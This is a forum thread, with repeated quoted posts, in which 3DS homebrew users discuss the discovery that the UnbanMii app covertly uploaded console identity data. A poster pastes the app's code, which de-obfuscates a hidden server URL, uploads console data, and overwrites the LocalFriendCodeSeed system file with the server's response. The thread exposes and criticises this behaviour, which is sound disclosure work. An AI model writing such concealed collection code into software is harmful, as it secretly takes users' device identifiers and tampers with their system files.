I feel bad though since I was in the group that @astronautlevel just posted. I should of been more aware on what was going on before promoting it on the guide...It's not your fault man, relax
I feel bad though since I was in the group that @astronautlevel just posted. I should of been more aware on what was going on before promoting it on the guide...It's not your fault man, relax
It's fine - you took responsibility, I don't blame you. Everyone makes mistakes and has lapses in judgement.I feel bad though since I was in the group that @astronautlevel just posted. I should of been more aware on what was going on before promoting it on the guide...
Thank god, that @astronautlevel was bored then! Still I don't understand why it isn't a simple downloader and injector. That's all it's suppose to be right?To think none of this would really be out there if one single person wasn't bored. Fascinating.
It's fine - you took responsibility, I don't blame you. Everyone makes mistakes and has lapses in judgement.
int DownloadPlugin()
{
obf obfbuf[0x80];
memcpy(obfbuf, urlbuf, 0x100);
layerdeobfuscate(obfbuf, 0x80, (obf*)&eke, (obf*)&mod, 4);
do
{
u8* ptr = (u8*)obfbuf;
u8 i = 0;
do
{
ptr[i] ^= haxbuf[i];
}
while(++i);
}
while(0);
char url[0x41];
do
{
u8 i = 0x41;
while(i--) url[i] = obfbuf[i] & 0xFF;
}
while(0);
memset(obfbuf, 0, 0x100);
u8 upbuf[0x380];
Result res = mkupbuf(upbuf);
if(res < 0)
{
#ifdef DEBUG
printf("Failed to mkupbuf: %08X\n", res);
#endif
memset(url, 0, 0x40);
return -1;
}
u8* buffer = NULL;
u32 size = 0;
res = httpcUpload(upbuf, 0x380, url, &buffer, &size);
memset(url, 0, 0x40);
if(res >= 0)
{
if (size != 272)
{
printf("Server-side error: %*.*s\n", size, size, buffer);
return -1;
}
if (size < 272 || *(u64*)(buffer + 0x100))
{
printf("Invalid respose: %*.*s\n", size, size, buffer);
return -1;
}
u8 dummy[4];
if(fsReadFile(dummy, "/rw/sys/LocalFriendCodeSeed_A", 4, ARCHIVE_NAND_CTR_FS) >= 0)
res = fsWriteFile(buffer, size, "/rw/sys/LocalFriendCodeSeed_A", ARCHIVE_NAND_CTR_FS);
else
res = fsWriteFile(buffer, size, "/rw/sys/LocalFriendCodeSeed_B", ARCHIVE_NAND_CTR_FS);
free(buffer);
if(res >= 0)
{
puts("Successfully writed file, rebooting...");
svcSleepThread(3e9);
if(reboot() >= 0) while(1) svcSleepThread(1e9);
//if(srvPublishToSubscriber(0x203, 0) >= 0) while (1) svcSleepThread(1e9);
*(u32*)0 = 0xDEADCAFE;
//how can you even reach past this?!
svcExitProcess();
}
else
{
printf("An error occurred while injecting the Seed: %08X\n", res);
return -1;
}
return (0);
}
else
{
free(buffer);
memset(url, 0, 0x40);
printf("Download failed: %08X\n", res);
}
return (-1);
}
Result DumpSeed()
{
u8 upbuffer[0x380];
u8* downbuffer = 0;
u32 downsize = 0;
Result res = mkupbuf(upbuffer);
#ifdef DEBUG
fsWriteFile(upbuffer, 0x380, "/UnbanMii/POST_DUMP", ARCHIVE_SDMC);
#endif
obf obfbuf[0x80];
memcpy(obfbuf, urlbuf, 0x100);
layerdeobfuscate(obfbuf, 0x80, (obf*)&eke, (obf*)&mod, 4);
do
{
u8* ptr = (u8*)obfbuf;
u8 i = 0;
do
{
ptr[i] ^= haxbuf[i];
}
while(++i);
}
while(0);
char url[0x40];
do
{
u8 i = 0x40;
while(i--) url[i] = obfbuf[i + 0x41] & 0xFF;
}
while(0);
memset(obfbuf, 0, 0x100);
Result ret = httpcUpload(upbuffer, 0x380, url, &downbuffer, &downsize);
if(ret < 0)
{
printf("Failed to upload: %08X\n", ret);
}
memset(url, 0, 0x40);
//#ifdef DEBUG
printf("Server response: %*.*s\n", downsize, downsize, downbuffer);
//#endif
if(downbuffer) free(downbuffer);
return ret;
}
Nothing else really...So.... what did I miss? Apart from the fact that whoever made UnbanMii played us like an effing harp?
Sent from my SM-T280 using Tapatalk
I agree with you that Themely being closed source is not a good thing; however, Themely is made by a different user (Themely was made by Erman, who has a bad track record anyway, while this was made by Sono). I'd actually trust Themely more if it was made by Sono rather than Erman.@astronautlevel what about themely? Im worried about that app because i use it a lot and i think it have malware too because it was made by the same user and a month ago he closed the code but if we analyze deeply unban mii manipulates directly the local seed and movable seed and themely only works with theme mánager so its logic he was mad :/ and sudenly upload a "new" versión by revenge
Well well, what i found (?I agree with you that Themely being closed source is not a good thing; however, Themely is made by a different user (Themely was made by Erman, who has a bad track record anyway, while this was made by Sono). I'd actually trust Themely more if it was made by Sono rather than Erman.
That being said, I'm working on a new Theme manager that will be released soon (open source, obviously ), so if you're concerned about using Themely stay tuned.
Can you PM me when its available? While you're at it, you should open your own theme site. Erman is never going to host NSFW content, so why don't you?I agree with you that Themely being closed source is not a good thing; however, Themely is made by a different user (Themely was made by Erman, who has a bad track record anyway, while this was made by Sono). I'd actually trust Themely more if it was made by Sono rather than Erman.
That being said, I'm working on a new Theme manager that will be released soon (open source, obviously ), so if you're concerned about using Themely stay tuned.
The latest release on that fork is open source and thus guaranteed to be safe.@astronautlevel What about this fork for themely? its safe to use it? : https://github.com/ihaveamac/Themely/releases/tag/v1.3.1
Yep thats evil closed source lol i know it because i see big tag on reddit warning about it.@alexei_gp this is the evil release but im interested on the cosmetic changes Lol
https://github.com/ErmanSayin/Themely/releases/tag/v1.3.2
Thank you very much for the information. Sorry
everyone that it took so long to reply I have been very busy today. As for those infected I am greatly sorry for this. I never knew that the devs implemented this crud into their app. I will remove this app from the guide as soon as I can. I hope that you all can forgive for this if you don't I understand. Now will u be willing to explain why UnbanMii does this @Alex S , @xXPaulMCXx , @MarcusD , @arc13 .
OK so let's go to basic security practice:
If you want to identify consoles, use something like SHA256's of the stuff like LCFS, SecureInfo, if you want to identify users with it (and tell them via Priv. Policy)
Not only is this smaller in size (hashes vs. files), it doesn't mean you have the actual IDs.
EDIT: Oh, and just add that in as idk "security.c" as a set of functions (I dont pretend to know C so ignore me if you dont make functions etc) so that all code but that is OSS, but you need to explain what it does for people to trust you.
just to re-iterate from the entry, I still do believe Sono/MarcusD had no malicious intent doing this. I'm still blaming the others, especially Paul who said we read the code and apologized (we saw more than what we were told and I don't recall us ever apologizing).first of all, please stop blaming the others... I did 100% of the server backend, I added the code in UnbanMii that uploads stuff to the server (including the shitty crypto for obfuscating the URLs), and I compiled the release version. but I went to sleep after that, so the others weren't able to review the code at all before making the cia public.
also, here are what the other people did:
- Paul did the original code before I got the source code
- arc13 helped Paul
- Alex promoted it
but before any of you were to start to bash me, please take your time to read the technical writeup blogpost
I have never thought of just storing the hashes... I was stupid when I made the decisions with the backend code, but now I feel even more stupid >.<
Honestly? We're all human. We all make mistakes. Some times, you make big mistakes, other times small.I have never thought of just storing the hashes... I was stupid when I made the decisions with the backend code, but now I feel even more stupid >.<
Honestly? We're all human. We all make mistakes. Some times, you make big mistakes, other times small.
You tried to solve a potential problem and you didn't do it the best way, but that is OK. I'd suggest removing links to UnbanMii's latest copy with the code, and instead inform users to not use that version (remove the ID stuff ofc) - remove all copies from any DBs you could potentially still have too.
The community lost their trust in your software, however it's still more than salvagable. I suggest something like re-OSS'ing it and getting various developers to ensure it looks good - if you do something like check hashes, explain every single reason why, and inform people of why you do it.